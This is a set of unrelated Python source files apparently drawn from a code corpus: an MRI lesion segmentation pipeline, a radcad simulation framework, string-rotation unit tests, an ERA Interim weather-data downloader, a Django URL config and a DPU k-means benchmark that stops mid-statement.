x_neg_patches = [
np.array(get_patches(image, centers, patch_size))
for image, centers in zip(images_norm, nolesion_small)]
y_neg_patches = [
np.array(get_patches(image, centers, patch_size))
for image, centers in zip(lesion_masks, nolesion_small)]
# concatenate positive and negative patches for each subject
X = np.concatenate([np.concatenate([x1, x2])
for x1, x2 in zip(x_pos_patches,
x_neg_patches)],
axis=0)
Y = np.concatenate([np.concatenate([y1, y2])
for y1, y2 in zip(y_pos_patches,
y_neg_patches)],
axis=0)
return X, Y
def test_cascaded_model(models, test_x_data, options, cuda):
"""
Test the cascaded approach using a learned model
inputs:
- CNN model: a list containing the two cascaded CNN models
- test_x_data: a nested dictionary containing testing image paths:
test_x_data['scan_name']['modality'] = path_to_image_modality
- options: dictionary containing general hyper-parameters:
outputs:
- output_segmentation
"""
# print '> CNN: testing the model'
# organize experiments
exp_folder = os.path.join(options['test_folder'],
options['test_scan'],
options['experiment'])
if not os.path.exists(exp_folder):
os.mkdir(exp_folder)
# first network
model=models[0]
options['test_name'] = options['experiment'] + '_debug_prob_0.nii.gz'
# only save the first iteration result if debug is True
save_nifti = True if options['debug'] is True else False
t1 = test_scan(model,
test_x_data,
options,
save_nifti=save_nifti, cuda=cuda)
# second network
options['test_name'] = options['experiment'] + '_prob_1.nii.gz'
model= models[1]
t2 = test_scan(model,
test_x_data,
options,
save_nifti=True,
candidate_mask=(t1 > 0.8))
# postprocess the output segmentation
# obtain the orientation from the first scan used for testing
scans = test_x_data.keys()
flair_scans = [test_x_data[s]['FLAIR'] for s in scans]
flair_image = load_nii(flair_scans[0])
options['test_name'] = options['experiment'] + '_hard_seg.nii.gz'
out_segmentation = post_process_segmentation(t2,
options,
save_nifti=True,
orientation=flair_image.affine)
# return out_segmentation
return out_segmentation
#return t1
def load_test_patches(test_x_data,
patch_size,
batch_size,
voxel_candidates=None,
datatype=np.float32):
"""
Function generator to load test patches with size equal to patch_size,
given a list of selected voxels. Patches are returned in batches to reduce
the amount of RAM used
Inputs:
- x_data: list containing all subject image paths for a single modality
- selected_voxels: list where each element contains the subject binary
mask for selected voxels [len(x), len(y), len(z)]
- tuple containing patch size, either 2D (p1, p2, 1) or 3D (p1, p2, p3)
- Voxel candidates: a binary mask containing voxels for testing
Outputs (in batches):
- X: Train X data matrix for the each channel [num_samples, p1, p2, p3]
- voxel_coord: list of tuples with voxel coordinates (x,y,z) of
selected patches
"""
# get scan names and number of modalities used
scans = list(test_x_data.keys())
modalities = list(test_x_data[scans[0]].keys())
# load all image modalities and normalize intensities
images = []
for m in modalities:
raw_images = [load_nii(test_x_data[s][m]).get_data() for s in scans]
images.append([normalize_data(im) for im in raw_images])
# select voxels for testing. Discard CSF and darker WM in FLAIR.
# If voxel_candidates is not selected, using intensity > 0.5 in FLAIR,
# else use the binary mask to extract candidate voxels
if voxel_candidates is None:
flair_scans = [test_x_data[s]['FLAIR'] for s in scans]
selected_voxels = [get_mask_voxels(mask)
for mask in select_training_voxels(flair_scans,
0.5)][0]
else:
selected_voxels = get_mask_voxels(voxel_candidates)
# yield data for testing with size equal to batch_size
# for i in range(0, len(selected_voxels), batch_size):
# c_centers = selected_voxels[i:i+batch_size]
# X = []
# for m, image_modality in zip(modalities, images):
# X.append(get_patches(image_modality[0], c_centers, patch_size))
# yield np.stack(X, axis=1), c_centers
X = []
for image_modality in images:
X.append(get_patches(image_modality[0], selected_voxels, patch_size))
#print(len(X), len(X[0]))
Xs = np.stack(X, axis=1)
#print(Xs.shape)
return Xs, selected_voxels
def get_mask_voxels(mask):
"""
Compute x,y,z coordinates of a binary mask
Input:
- mask: binary mask
Output:
- list of tuples containing the (x,y,z) coordinate for each of the
input voxels
"""
indices = np.stack(np.nonzero(mask), axis=1)
indices = [tuple(idx) for idx in indices]
return indices
def get_patches(image, centers, patch_size=(15, 15, 15)):
"""
Get image patches of arbitrary size based on a set of centers
"""
# If the size has even numbers, the patch will be centered. If not,
# it will try to create an square almost centered. By doing this we allow
# pooling when using encoders/unets.
patches = []
list_of_tuples = all([isinstance(center, tuple) for center in centers])
    sizes_match = all(len(center) == len(patch_size) for center in centers)
if list_of_tuples and sizes_match:
patch_half = tuple([idx//2 for idx in patch_size])
new_centers = [map(add, center, patch_half) for center in centers]
padding = tuple((idx, size-idx)
for idx, size in zip(patch_half, patch_size))
new_image = np.pad(image, padding, mode='constant', constant_values=0)
slices = [[slice(c_idx-p_idx, c_idx+(s_idx-p_idx))
for (c_idx, p_idx, s_idx) in zip(center,
patch_half,
patch_size)]
for center in new_centers]
        patches = [new_image[tuple(idx)] for idx in slices]  # tuple() keeps this indexing valid on modern NumPy
#patches = np.array(patches)
return patches
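# Tiny worked example (added for clarity): a 3x3x3 patch around the centre of
# a 5x5x5 volume is the interior cube, thanks to the zero padding above.
# >>> vol = np.arange(125).reshape(5, 5, 5)
# >>> get_patches(vol, [(2, 2, 2)], patch_size=(3, 3, 3))[0].shape
# (3, 3, 3)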
def test_scan(model,
test_x_data,
options,
save_nifti=True,
candidate_mask=None, cuda= True):
"""
Test data based on one model
Input:
- test_x_data: a nested dictionary containing training image paths:
train_x_data['scan_name']['modality'] = path_to_image_modality
- save_nifti: save image segmentation
- candidate_mask: a binary masks containing voxels to classify
Output:
    - test_scan = Output image containing the probabilistic output segmentation
- If save_nifti --> Saves a nifti file at specified location
options['test_folder']/['test_scan']
"""
# get_scan name and create an empty nifti image to store segmentation
scans = list(test_x_data.keys())
flair_scans = [test_x_data[s]['FLAIR'] for s in scans]
flair_image = load_nii(flair_scans[0])
seg_image = np.zeros_like(flair_image.get_data().astype('float32'))
if candidate_mask is not None:
all_voxels = np.sum(candidate_mask)
else:
all_voxels = np.sum(flair_image.get_data() > 0)
if options['debug'] is True:
print ("> DEBUG ", scans[0], "Voxels to classify:", all_voxels)
# compute lesion segmentation in batches of size options['batch_size']
batch, centers = load_test_patches(test_x_data,
options['patch_size'],
options['batch_size'],
candidate_mask)
if options['debug'] is True:
print ("> DEBUG: testing current_batch:", batch.shape,)
with torch.no_grad():
model.eval()
iter_num = len(batch)//options['batch_size'] if len(batch) % options['batch_size'] ==0 else len(batch)//options['batch_size'] +1
for i in range(iter_num):
start=i*options['batch_size']
end=start+options['batch_size']
data_source_valid = batch[start:end, :]
current_centers = centers[start:end]
# last batch not completed
# last iter from batches less than batch_size
if i ==iter_num-1 and len(batch) % options['batch_size'] != 0:
#data_source_valid = batch[start:, :]
#current_centers = centers[start:]
end = options['batch_size']-len(data_source_valid)
data_source_valid = np.concatenate((data_source_valid, batch[:end, :]), axis=0)
current_centers = np.concatenate((current_centers, centers[:end]), axis=0)
data_source_valid = torch.from_numpy(data_source_valid)
if cuda:
data_source_valid = data_source_valid.cuda()
data_source_valid= Variable(data_source_valid)
s_output, _ = model(data_source_valid)
#F.log_softmax(s_output, dim = 1) # sum up batch loss
y_pred = s_output.data.max(1)[1] # get the index of the max log-probability
y_pred = y_pred.detach().cpu().numpy()
y_pred.reshape(-1, 1)
#y_pred = y_pred.numpy()
[x, y, z] = np.stack(current_centers, axis=1)
seg_image[x, y, z] = y_pred
if options['debug'] is True:
print ("...done!")
# check if the computed volume is lower than the minimum accuracy given
# by the min_error parameter
if check_min_error(seg_image, options, flair_image.header.get_zooms()):
if options['debug']:
print ("> DEBUG ", scans[0], "lesion volume below ", \
options['min_error'], 'ml')
seg_image = np.zeros_like(flair_image.get_data().astype('float32'))
if save_nifti:
out_scan = nib.Nifti1Image(seg_image, affine=flair_image.affine)
out_scan.to_filename(os.path.join(options['test_folder'],
options['test_scan'],
options['experiment'],
options['test_name']))
return seg_image
def check_min_error(input_scan, options, voxel_size):
"""
    check whether the computed lesion volume is below the minimum volume
    given by the parameter min_error
"""
from scipy import ndimage
t_bin = options['t_bin']
l_min = options['l_min']
# get voxel size in mm^3
voxel_size = np.prod(voxel_size) / 1000.0
# threshold input segmentation
output_scan = np.zeros_like(input_scan)
t_segmentation = input_scan >= t_bin
# filter candidates by size and store those > l_min
labels, num_labels = ndimage.label(t_segmentation)
label_list = np.unique(labels)
num_elements_by_lesion = ndimage.labeled_comprehension(t_segmentation,
labels,
label_list,
np.sum,
float, 0)
for l in range(len(num_elements_by_lesion)):
if num_elements_by_lesion[l] > l_min:
# assign voxels to output
current_voxels = np.stack(np.where(labels == l), axis=1)
output_scan[current_voxels[:, 0],
current_voxels[:, 1],
current_voxels[:, 2]] = 1
return (np.sum(output_scan == 1) * voxel_size) < options['min_error']
def select_voxels_from_previous_model(model, train_x_data, options):
"""
Select training voxels from image segmentation masks
"""
# get_scan names and number of modalities used
scans = list(train_x_data.keys())
# select voxels for training. Discard CSF and darker WM in FLAIR.
# flair_scans = [train_x_data[s]['FLAIR'] for s in scans]
# selected_voxels = select_training_voxels(flair_scans, options['min_th'])
# evaluate training scans using the learned model and extract voxels with
# probability higher than 0.5
seg_masks = []
for scan, s in zip(train_x_data.keys(), range(len(scans))):
#print(train_x_data.items())
#print(dict(list(train_x_data.items())[s:s+1]))
seg_mask = test_scan(model,
dict(list(train_x_data.items())[s:s+1]),
options, save_nifti=False)
seg_masks.append(seg_mask > 0.5)
if options['debug']:
flair = nib.load(train_x_data[scan]['FLAIR'])
tmp_seg = nib.Nifti1Image(seg_mask,
affine=flair.affine)
#tmp_seg.to_filename(os.path.join(options['weight_paths'],
# options['experiment'],
# '.train',
# scan + '_it0.nii.gz'))
# check candidate segmentations:
# if no voxels have been selected, return candidate voxels on
# FLAIR modality > 2
flair_scans = [train_x_data[s]['FLAIR'] for s in scans]
images = [load_nii(name).get_data() for name in flair_scans]
images_norm = [normalize_data(im) for im in images]
seg_mask = [im > 2 if np.sum(seg) == 0 else seg
for im, seg in zip(images_norm, seg_masks)]
return seg_mask
def post_process_segmentation(input_scan,
options,
save_nifti=True,
orientation=np.eye(4)):
"""
Post-process the probabilistic segmentation using params t_bin and l_min
t_bin: threshold to binarize the output segmentations
l_min: minimum lesion volume
Inputs:
- input_scan: probabilistic input image (segmentation)
- options dictionary
- save_nifti: save the result as nifti
Output:
- output_scan: final binarized segmentation
"""
from scipy import ndimage
t_bin = options['t_bin']
l_min = options['l_min']
output_scan = np.zeros_like(input_scan)
# threshold input segmentation
t_segmentation = input_scan >= t_bin
# filter candidates by size and store those > l_min
labels, num_labels = ndimage.label(t_segmentation)
label_list = np.unique(labels)
num_elements_by_lesion = ndimage.labeled_comprehension(t_segmentation,
labels,
label_list,
np.sum,
float, 0)
for l in range(len(num_elements_by_lesion)):
if num_elements_by_lesion[l] > l_min:
# assign voxels to output
current_voxels = np.stack(np.where(labels == l), axis=1)
output_scan[current_voxels[:, 0],
current_voxels[:, 1],
current_voxels[:, 2]] = 1
# save the output segmentation as Nifti1Image
if save_nifti:
nifti_out = nib.Nifti1Image(output_scan,
affine=orientation)
nifti_out.to_filename(os.path.join(options['test_folder'],
options['test_scan'],
options['experiment'],
options['test_name']))
return output_scan
|
StarcoderdataPython
|
1765205
|
<reponame>bloxmove-com/TE_Simulations_Research_Group
from radcad.engine import Engine
from collections import namedtuple
RunArgs = namedtuple("RunArgs", "simulation timesteps run subset initial_state state_update_blocks parameters deepcopy drop_substeps")
Context = namedtuple("Context", "simulation run subset timesteps initial_state parameters")
class Model:
def __init__(self, initial_state={}, state_update_blocks=[], params={}):
self.initial_state = initial_state
self.state_update_blocks = state_update_blocks
self.params = params
class Simulation:
def __init__(self, model: Model, timesteps=100, runs=1, **kwargs):
self.model = model
self.timesteps = timesteps
self.runs = runs
self.index = kwargs.pop("index", 0)
self.engine = kwargs.pop("engine", Engine())
self.experiment = Experiment(self)
if kwargs:
raise Exception(f"Invalid Simulation option in {kwargs}")
def run(self):
return self.engine._run(experiment=self.experiment)
class Experiment:
"""
An Experiment.
"""
def __init__(self, simulations=[], **kwargs):
self.engine = kwargs.pop("engine", Engine())
self.simulations = []
self.results = []
self.exceptions = []
# Add and validate simulations
self.add_simulations(simulations)
# Hooks
self.before_experiment = kwargs.pop("before_experiment", None)
self.after_experiment = kwargs.pop("after_experiment", None)
self.before_simulation = kwargs.pop("before_simulation", None)
self.after_simulation = kwargs.pop("after_simulation", None)
self.before_run = kwargs.pop("before_run", None)
self.after_run = kwargs.pop("after_run", None)
self.before_subset = kwargs.pop("before_subset", None)
self.after_subset = kwargs.pop("after_subset", None)
if kwargs:
raise Exception(f"Invalid Experiment option in {kwargs}")
def run(self):
return self.engine._run(experiment=self)
def add_simulations(self, simulations):
if not isinstance(simulations, list):
simulations = [simulations]
if any(not isinstance(sim, Simulation) for sim in simulations):
raise Exception("Invalid simulation added")
self.simulations.extend(simulations)
def clear_simulations(self):
cleared = True if self.simulations else False
self.simulations = []
return cleared
def get_simulations(self):
return self.simulations
# Hooks
def _before_experiment(self, experiment=None):
if self.before_experiment:
self.before_experiment(experiment=experiment)
def _after_experiment(self, experiment=None):
if self.after_experiment:
self.after_experiment(experiment=experiment)
def _before_simulation(self, simulation=None):
if self.before_simulation:
self.before_simulation(
simulation=simulation
)
def _after_simulation(self, simulation=None):
if self.after_simulation:
self.after_simulation(
simulation=simulation
)
def _before_run(self, context: Context=None):
if self.before_run:
self.before_run(context=context)
def _after_run(self, context: Context=None):
if self.after_run:
self.after_run(context=context)
def _before_subset(self, context: Context=None):
if self.before_subset:
self.before_subset(context=context)
def _after_subset(self, context: Context=None):
if self.after_subset:
self.after_subset(context=context)
|
StarcoderdataPython
|
3234396
|
<gh_stars>1-10
from ..P9_string_rotation import is_rotated_string, is_rotated_string_naive
def test_rotate_empty():
""" '' in '' is True by convention."""
s1, s2 = '', ''
assert is_rotated_string_naive(s1, s2)
assert is_rotated_string(s1, s2)
def test_rotate_one_element_true():
s1, s2 = 'a', 'a'
assert is_rotated_string_naive(s1, s2)
assert is_rotated_string(s1, s2)
def test_rotate_one_element_false():
s1, s2 = 'a', 'b'
assert not is_rotated_string_naive(s1, s2)
assert not is_rotated_string(s1, s2)
def test_same_string():
s1, s2 = 'abcdefgh', 'abcdefgh'
assert is_rotated_string_naive(s1, s2)
assert is_rotated_string(s1, s2)
def test_different_lengths():
s1, s2 = 'abcde', 'abcdef'
assert not is_rotated_string_naive(s1, s2)
assert not is_rotated_string(s1, s2)
def test_repeated_pattern():
s1, s2 = 'tictactic', 'tictictac'
assert is_rotated_string_naive(s1, s2)
assert is_rotated_string(s1, s2)
def test_rotated_string():
s1, s2 = 'ttleponymyli', 'mylittlepony'
assert is_rotated_string_naive(s1, s2)
assert is_rotated_string(s1, s2)
def test_not_rotated_string():
s1, s2 = 'Python', 'ythonC'
assert not is_rotated_string_naive(s1, s2)
assert not is_rotated_string(s1, s2)
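# Reference sketch (an assumption about the implementations under test, added
# for context): s2 is a rotation of s1 exactly when the lengths match and s2
# occurs inside s1 + s1.
def _is_rotated_string_reference(s1, s2):
    return len(s1) == len(s2) and s2 in s1 + s1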
|
StarcoderdataPython
|
131425
|
<reponame>wpreimes/ecmwf_models<filename>src/ecmwf_models/erainterim/download.py
# -*- coding: utf-8 -*-
"""
Module to download ERA Interim from terminal.
"""
from ecmwfapi import ECMWFDataServer
import argparse
import sys
from datetime import datetime, timedelta
import shutil
import os
import warnings
from ecmwf_models.utils import (
load_var_table,
save_ncs_from_nc,
save_gribs_from_grib,
lookup,
mkdate,
str2bool
)
def default_variables() -> list:
"These variables are being downloaded, when None are passed by the user"
lut = load_var_table(name="ERAINT")
defaults = lut.loc[lut["default"] == 1]["dl_name"].values
return defaults.tolist()
def download_eraint(
target_path,
start,
end,
variables,
grid_size=None,
type="fc",
h_steps=(0, 6, 12, 18),
grb=False,
dry_run=False,
steps=(0,),
):
"""
Download era interim data
Parameters
----------
target_path : str
path at which to save the downloaded grib file
start : date
start date
end : date
end date
variables : list
parameter ids, see wiki
    type : str, optional (default: "fc")
        Data stream type to download, e.g. "an" (analysis) or "fc" (forecast)
    grid_size: [float,float], optional
        size of the grid in form (lon, lat), which the data is resampled to.
        If None is passed, the minimum grid size for the product is chosen
h_steps: tuple, optional (default: (0, 6, 12, 18))
List of full hours to download data at the selected dates
grb: bool, optional (default: False)
Download data as grb files instead of nc files
dry_run: bool
Do not download anything, this is just used for testing the functions
"""
if dry_run:
warnings.warn("Dry run does not create connection to ECMWF")
server = None
else:
server = ECMWFDataServer()
param_strings = []
dataset = "interim"
dataclass = "ei"
for variable in variables:
param_strings.append(str(variable))
timestep_strings = []
for timestep in h_steps:
timestep_strings.append("%02d" % timestep)
param_string = "/".join(param_strings)
timestep_string = "/".join(timestep_strings)
date_string = "%s/to/%s" % (
start.strftime("%Y-%m-%d"),
end.strftime("%Y-%m-%d"),
)
grid_size = "%f/%f" % (grid_size[0], grid_size[1]) if grid_size else None
step = "/".join([str(s) for s in steps])
# ATTENTION: When downloading netcdf files steps and times
# must not overlap!! see:
# https://software.ecmwf.int/wiki/display/CKB/What+to+do+with+ECCODES+ERROR+%3A+Try+using+the+-T+option # noqa: E501
dl_params = {
"class": dataclass,
"dataset": dataset,
"expver": "1",
"stream": "oper",
"type": type,
"levtype": "sfc",
"param": param_string,
"date": date_string,
"time": timestep_string,
"step": step,
"grid": grid_size,
"format": "grib1" if grb else "netcdf",
"target": target_path,
}
if not grid_size:
if not grb:
grid_size = "%f/%f" % (0.75, 0.75)
dl_params["grid"] = grid_size
else:
del dl_params["grid"]
else:
        # grid_size has been converted to a "lon/lat" string above, so parse the values back
        if any(float(size) < 0.75 for size in grid_size.split("/")):
raise Warning(
"Custom grid smaller than original ERA Interim resolution. "
"See https://software.ecmwf.int/wiki/display/CKB/"
"Does+downloading+data+at+higher+resolution+improve+the+output" # noqa: E501
)
if not dry_run:
server.retrieve(dl_params)
def download_and_move(
target_path,
startdate,
enddate,
variables=None,
keep_original=False,
grid_size=None,
type="an",
h_steps=(0, 6, 12, 18),
steps=(0,),
grb=False,
dry_run=False,
):
"""
Downloads the data from the ECMWF servers and moves them to the target
path. This is done in 30 days increments between start and end date to
be efficient with the MARS system.
See the recommendation for doing it this way in
https://software.ecmwf.int/wiki/display/WEBAPI/ERA-Interim+daily+retrieval+efficiency
The files are then extracted into separate grib/nc files and stored in
yearly folders under the target_path.
Parameters
----------
target_path: str
Path to which to copy the extracted parameter files
startdate: datetime
First date to download
enddate: datetime
Last date to download
variables : list, optional (default: None)
List of variable ids to pass to the client, if None are passed,
the default variable ids will be downloaded.
keep_original: bool, optional (default: False)
Keep the original downloaded data
grid_size: list, optional (default: None)
[lon, lat] extent of the grid (regular for netcdf, at lat=0 for grib)
If None is passed, the default grid size for the data product is used.
type : str, optional (default: 'an')
        Data stream / model type to download data for (fc=forecast)
h_steps: list, optional (default: [0, 6, 12, 18])
List of full hours to download data at the selected dates
grb: bool, optional (default: False)
Download data as grib files instead of netcdf files
dry_run: bool
Do not download anything, this is just used for testing the functions
"""
product = "eraint"
if variables is None:
variables = default_variables()
else:
# find the dl_names
variables = lookup(name=product, variables=variables)
variables = variables["dl_name"].values.tolist()
td = timedelta(days=30)
current_start = startdate
while current_start <= enddate:
current_end = current_start + td
if current_end >= enddate:
current_end = enddate
fname = "{start}_{end}.{ext}".format(
start=current_start.strftime("%Y%m%d"),
end=current_end.strftime("%Y%m%d"),
ext="grb" if grb else "nc",
)
downloaded_data_path = os.path.join(target_path, "temp_downloaded")
if not os.path.exists(downloaded_data_path):
os.mkdir(downloaded_data_path)
dl_file = os.path.join(downloaded_data_path, fname)
download_eraint(
dl_file,
current_start,
current_end,
variables,
grid_size=grid_size,
h_steps=h_steps,
type=type,
steps=steps,
grb=grb,
dry_run=dry_run,
)
if grb:
save_gribs_from_grib(dl_file, target_path, product.upper())
else:
save_ncs_from_nc(dl_file, target_path, product.upper())
if not keep_original:
shutil.rmtree(downloaded_data_path)
current_start = current_end + timedelta(days=1)
def parse_args(args):
"""
Parse command line parameters for recursive download
Parameters
----------
args : list
Command line parameters as list of strings
Returns
----------
clparams : argparse.Namespace
Parsed command line parameters
"""
parser = argparse.ArgumentParser(
description="Download ERA Interim data (6H) between two dates. "
"Before this program can be used, you have to register at ECMWF "
"and setup your .ecmwfapirc file as described here: "
"https://confluence.ecmwf.int//display/WEBAPI/Access+ECMWF+Public+Datasets#AccessECMWFPublicDatasets-key" # noqa: E501
)
parser.add_argument(
"localroot",
help="Root of local filesystem where the downloaded data is stored.",
)
parser.add_argument(
"-s",
"--start",
type=mkdate,
default=datetime(1979, 1, 1),
help=(
"Startdate in format YYYY-MM-DD. "
"If no data is found there then the first available date of "
"the product is used."
),
)
parser.add_argument(
"-e",
"--end",
type=mkdate,
default=datetime.now(),
help=(
"Enddate in format YYYY-MM-DD. "
"If not given then the current date is used."
),
)
parser.add_argument(
"-var",
"--variables",
metavar="variables",
type=str,
default=None,
nargs="+",
help=(
"Name of variables to download. "
"A list of possible IDs is available at "
"https://github.com/TUW-GEO/ecmwf_models/tree/master/ecmwf_models/erainterim/eraint_lut.csv " # noqa: E501
"or by using the 'View MARS request' option in the web based "
"ordering system."
),
)
parser.add_argument(
"-keep",
"--keep_original",
type=str2bool,
default="False",
help=(
"Keep the originally, temporally downloaded file as it is "
"instead of deleting it afterwards"
),
)
parser.add_argument(
"-grb",
"--as_grib",
type=str2bool,
default="False",
help=(
"Download data in grib1 format instead of the default "
"netcdf format"
),
)
parser.add_argument(
"--h_steps",
type=int,
default=None,
nargs="+",
help=("Manually change the temporal resolution of donwloaded images"),
)
parser.add_argument(
"--steps",
type=int,
default=None,
nargs="+",
help=("Manually change the steps"),
)
parser.add_argument(
"--type",
type=str,
default="an",
help=("Manually set the data stream, e.g. 'an' (default) or 'fc'"),
)
parser.add_argument(
"--grid_size",
type=float,
default=None,
nargs="+",
help=(
"lon lat. Size of the grid that the data is stored to. "
"Should be at least (and is by default) "
"(0.75, 0.75) for ERA-Interim "
),
)
args = parser.parse_args(args)
print("ERA Interim data is deprecated. Use ERA5 instead.")
print(
"Downloading ERA Interim {} data from {} to {} into folder {}".format(
"grib" if args.as_grib is True else "netcdf",
args.start.isoformat(),
args.end.isoformat(),
args.localroot,
)
)
return args
def main(args):
args = parse_args(args)
download_and_move(
target_path=args.localroot,
startdate=args.start,
enddate=args.end,
variables=args.variables,
keep_original=args.keep_original,
grid_size=args.grid_size,
h_steps=args.h_steps,
type=args.type,
grb=args.as_grib,
)
def run():
main(sys.argv[1:])
|
StarcoderdataPython
|
1777220
|
from django.conf.urls import url, include
from .views import ModuleList
urlpatterns = [
url(r'^$', ModuleList.as_view(), name='module_list'),
]
|
StarcoderdataPython
|
1645816
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from collections.abc import Sequence
from random import random
from time import perf_counter, sleep
import numpy as np
import pandas as pd
import yaml
from sklearn.cluster import KMeans as CPUKMeans
from sklearn.datasets import make_blobs
from sklearn.metrics import adjusted_rand_score, calinski_harabasz_score
from tqdm import tqdm
from dpu_kmeans import KMeans as DPU_KMeans
from dpu_kmeans import _dimm
def get_int_keys(d: dict, prefix=()) -> list:
"""
Recursively returns the keys of a dictionary that hold integers.
"""
keys = []
for k, v in d.items():
if (
isinstance(v, int)
and not isinstance(v, bool)
or isinstance(v, list)
and all(isinstance(n, int) for n in v)
):
rec_key = prefix + (k,)
keys.append(rec_key)
elif isinstance(v, dict):
keys.extend(get_int_keys(v, prefix + (k,)))
return keys
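# Worked example (added for clarity): booleans are excluded even though bool
# is a subclass of int, and nested dicts contribute tuple key paths.
# >>> get_int_keys({"a": 1, "b": {"c": [2, 3]}, "d": True})
# [('a',), ('b', 'c')]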
def get_experiments() -> pd.DataFrame:
"""
Loads the experiments from the params.yaml file.
"""
# load the params.yaml file as a dictionary
# script_dir = os.path.dirname(__file__)
# params_file = os.path.join(script_dir, "params.yaml")
params_file = "params.yaml"
with open(params_file, "r") as f:
params = yaml.load(f, Loader=yaml.FullLoader)
# convert number of points to an integer
params["data"]["n_points"] = int(params["data"]["n_points"])
# convert the dictionary to a pandas DataFrame and explode the experiments
df = pd.DataFrame.from_dict(params, orient="index").stack().to_frame().transpose()
for col in list(df.columns):
df = df.explode(col, ignore_index=True)
df["data", "n_points"] = df.apply(
lambda row: row["data", "n_points"] * row["dimm", "n_dpu"]
if row["data", "scaling"]
else row["data", "n_points"],
axis=1,
)
# convert integer columns back to int type as this was lost in the dataframe creation
integer_columns = get_int_keys(params)
for column in df:
if column in integer_columns:
df[column] = df[column].astype(int)
# adding a layer to the multi-index
df = pd.concat([df], axis=1, keys=["inputs"])
return df
def get_desc(nonconstants: Sequence, params: pd.DataFrame) -> str:
"""
Returns the description of a set of parameters.
"""
return (
"(" + ", ".join([p + ": " + str(params[p]) for p in nonconstants]) + ")"
if len(nonconstants) > 0
else ""
)
def generate_dataset(**kwargs) -> np.ndarray:
"""
Generates a dataset
"""
data, _ = make_blobs(
n_samples=kwargs["n_points"],
n_features=kwargs["n_dim"],
centers=kwargs["centers"],
random_state=kwargs["random_state"],
)
return data
def load_dataset(**kwargs) -> np.ndarray:
"""
Loads a dataset
"""
# script_dir = os.path.dirname(__file__)
dataset_name = kwargs["name"]
dataset_file = os.path.join("data", dataset_name + ".pq")
df = pd.read_parquet(dataset_file)
data = np.require(
df.iloc[:, 1:].to_numpy(dtype=np.float32), requirements=["C", "A", "O"]
)
return data
def get_dataset(**kwargs) -> np.ndarray:
"""
Generates or load a dataset
"""
if kwargs["synthetic"]:
return generate_dataset(**kwargs)
else:
return load_dataset(**kwargs)
def run_benchmark(verbose: bool = False) -> None:
"""
Runs the benchmark.
"""
# load the experiments
df = get_experiments()
# run the experiments
# get unique dataset parameters
datasets = df.inputs.data.drop_duplicates()
nonconstant_data = datasets.columns[datasets.nunique() > 1]
for _, dataset in (pbar_data := tqdm(datasets.iterrows(), total=datasets.shape[0])):
desc = get_desc(nonconstant_data, dataset)
pbar_data.set_description(f"getting dataset {desc}")
##################################################
# DATA GEN #
##################################################
data = get_dataset(**dataset)
pbar_data.set_description(f"with dataset {desc}")
dataset_df = df[(df.inputs.data == dataset).all(axis=1)]
trains = dataset_df.inputs.train.drop_duplicates()
nonconstant_train = trains.columns[trains.nunique() > 1]
for _, train_param in (
pbar_train := tqdm(trains.iterrows(), total=trains.shape[0], leave=False)
):
desc = get_desc(nonconstant_train, train_param)
pbar_train.set_description(f"running CPU {desc}")
##################################################
# CPU PERF #
##################################################
# perform the clustering on CPU
tic = perf_counter()
CPU_kmeans = CPUKMeans(
init="random",
verbose=verbose,
copy_x=False,
algorithm="full",
**train_param,
)
CPU_kmeans.fit(data)
toc = perf_counter()
pbar_train.set_description(f"scoring CPU {desc}")
# logging the results
cpu_index = (df.inputs.data == dataset).all(axis=1) & (
df.inputs.train == train_param
).all(axis=1)
df.loc[cpu_index, ("results", "cpu", "times")] = toc - tic
df.loc[
cpu_index, ("results", "cpu", "train_times")
] = CPU_kmeans.train_time_
df.loc[
cpu_index, ("results", "cpu", "preprocessing_times")
] = CPU_kmeans.preprocessing_timer_
df.loc[
cpu_index, ("results", "cpu", "single_kmeans_times")
] = CPU_kmeans.main_loop_timer_
df.loc[cpu_index, ("results", "cpu", "iterations")] = CPU_kmeans.n_iter_
df.loc[cpu_index, ("results", "cpu", "times_one_iter")] = (
CPU_kmeans.main_loop_timer_ / CPU_kmeans.n_iter_
)
# computing score
df.loc[cpu_index, ("results", "cpu", "score")] = calinski_harabasz_score(
data, CPU_kmeans.labels_
)
pbar_train.set_description(f"running DPU {desc}")
train_param_df = dataset_df[
(dataset_df.inputs.train == train_param).all(axis=1)
]
dimms = train_param_df.inputs.dimm.drop_duplicates()
nonconstant_dimm = dimms.columns[dimms.nunique() > 1]
for _, dimm_param in (
pbar_dimm := tqdm(dimms.iterrows(), total=dimms.shape[0], leave=False)
):
desc = get_desc(nonconstant_dimm, dimm_param)
pbar_dimm.set_description(f"on dimm {desc}")
##################################################
# DPU PERF #
##################################################
# load the DPUS
_dimm.free_dpus()
tic = perf_counter()
_dimm.set_n_dpu(dimm_param["n_dpu"])
_dimm.load_kernel("kmeans", verbose)
toc = perf_counter()
DPU_init_time = toc - tic
# perform the clustering on DPU
tic = perf_counter()
DPU_kmeans = DPU_KMeans(
init="random",
verbose=verbose,
copy_x=False,
reload_data=True,
**train_param,
)
DPU_kmeans.fit(data)
toc = perf_counter()
pbar_train.set_description(f"scoring {desc}")
# logging the results
dimm_index = (
(df.inputs.data == dataset).all(axis=1)
& (df.inputs.train == train_param).all(axis=1)
& (df.inputs.dimm == dimm_param).all(axis=1)
)
df.loc[dimm_index, ("results", "dpu", "times")] = toc - tic
df.loc[
dimm_index, ("results", "dpu", "train_times")
] = DPU_kmeans.train_time_
df.loc[dimm_index, ("results", "dpu", "init_times")] = DPU_init_time
df.loc[
dimm_index, ("results", "dpu", "preprocessing_times")
] = DPU_kmeans.preprocessing_timer_
df.loc[
dimm_index, ("results", "dpu", "cpu_pim_times")
] = DPU_kmeans.cpu_pim_time_
df.loc[
dimm_index, ("results", "dpu", "pim_cpu_times")
] = DPU_kmeans.pim_cpu_time_
df.loc[
dimm_index, ("results", "dpu", "inertia_times")
] = DPU_kmeans.inertia_timer_
df.loc[
dimm_index, ("results", "dpu", "reallocate_times")
] = DPU_kmeans.reallocate_timer_
df.loc[
dimm_index, ("results", "dpu", "single_kmeans_times")
] = DPU_kmeans.main_loop_timer_
df.loc[
dimm_index, ("results", "dpu", "kernel_runtime")
] = DPU_kmeans.dpu_run_time_
df.loc[dimm_index, ("results", "dpu", "inter_pim_core_times")] = (
DPU_kmeans.main_loop_timer_ - DPU_kmeans.dpu_run_time_
)
df.loc[
dimm_index, ("results", "dpu", "iterations")
] = DPU_kmeans.n_iter_
df.loc[dimm_index, ("results", "dpu", "times_one_iter")] = (
DPU_kmeans.main_loop_timer_ / DPU_kmeans.n_iter_
)
# computing score
df.loc[
dimm_index, ("results", "dpu", "score")
